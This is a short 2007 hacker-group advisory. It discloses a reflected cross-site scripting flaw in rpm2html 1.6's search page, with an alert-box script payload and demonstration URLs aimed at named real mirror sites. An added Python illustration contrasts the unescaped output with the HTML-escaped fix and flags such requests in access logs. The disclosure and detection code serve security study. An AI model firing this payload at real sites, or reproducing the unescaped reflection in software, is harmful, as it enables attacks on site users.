----------------------------------------------------------------------|
My Name: Vladiii |
My Country: Romania |
My Site: http://www.rstzone.net |
My Team: I hope to enter in RST-Crew :) |
Contact me: [email protected] |
Special Shoutz: kw3rln (fluffy_bunny), flo_flow_supremacy, mozi2weed, |
& all RST-crew & RSB-team Members. |
----------------------------------------------------------------------|
Vulnerable code: rpm2html 1.6 |
Download it from: http://public.www.planetmirror.com/pub/rpm2html/ |
---|
XSS Vulnerability in search function :) |
Details: we can change the query parameter in the URL to <script>alert('xss')</script> |
and a message box with our code will appear :) |
Demonstration: http://vulerablesite.com/path/rpm2html[path]/search.php?query=<script>alert('xss')</script>&blabla
Live demonstration: http://rpms.mandrivaclub.com/search.php?query=%3Cscript%3Ealert('xss')%3C/script%3E&submit=Search+…
http://rpmfind.net/linux/rpm2html/search.php?query=%3Cscript%3Ealert('xss')%3C/script%3E
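Added illustration, not rpm2html's own code: a Python model of the reflected "query" parameter showing the unescaped rendering beside the HTML-escaped fix, plus a check over access-log lines for the URL-encoded payload shape used in the demonstration links above. The URL, hostname and log lines are constructed for the example.

```python
import re
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed request URL modelled on the advisory's demonstration links:
# the payload sits, URL-encoded, in the "query" parameter of search.php.
DEMO_URL = ("http://vulnerablesite.example/rpm2html/search.php"
            "?query=%3Cscript%3Ealert('xss')%3C/script%3E&submit=Search")

# Constructed access-log lines (Common Log Format); only the second carries a payload.
ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2007:10:00:00 +0000] "GET /search.php?query=httpd HTTP/1.1" 200 4096',
    '10.0.0.9 - - [01/Jan/2007:10:00:07 +0000] "GET /search.php?query=%3Cscript%3Ealert'
    "('xss')%3C/script%3E&submit=Search HTTP/1.1\" 200 1536",
]

def query_param(url_or_path: str) -> str:
    """Return the percent-decoded 'query' parameter of a URL or request path ('' if absent)."""
    params = parse_qs(urlsplit(url_or_path).query, keep_blank_values=True)
    return params.get("query", [""])[0]

def render_unescaped(query: str) -> str:
    """Vulnerable pattern: the search term is copied verbatim into the result page."""
    return f"<h2>Results for: {query}</h2>"

def render_escaped(query: str) -> str:
    """Fixed pattern: HTML-escape the untrusted term before reflecting it."""
    return f"<h2>Results for: {escape(query, quote=True)}</h2>"

def reflects_markup(page: str, query: str) -> bool:
    """Regression check: the raw query contained a tag and was reflected unchanged."""
    return re.search(r"<\s*/?[a-zA-Z]", query) is not None and query in page

def suspicious_search_request(log_line: str) -> bool:
    """Heuristic detection: a search.php request whose decoded 'query' contains an HTML tag."""
    m = re.search(r'"(?:GET|POST) (\S+)', log_line)
    if not m or "search.php" not in m.group(1):
        return False
    return re.search(r"<\s*/?[a-zA-Z]", query_param(m.group(1))) is not None

if __name__ == "__main__":
    q = query_param(DEMO_URL)
    print("unescaped reflects payload:", reflects_markup(render_unescaped(q), q))
    print("escaped reflects payload:  ", reflects_markup(render_escaped(q), q))
    print("flagged log lines:", [suspicious_search_request(l) for l in ACCESS_LOG])
```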
POC !
vladiii 2007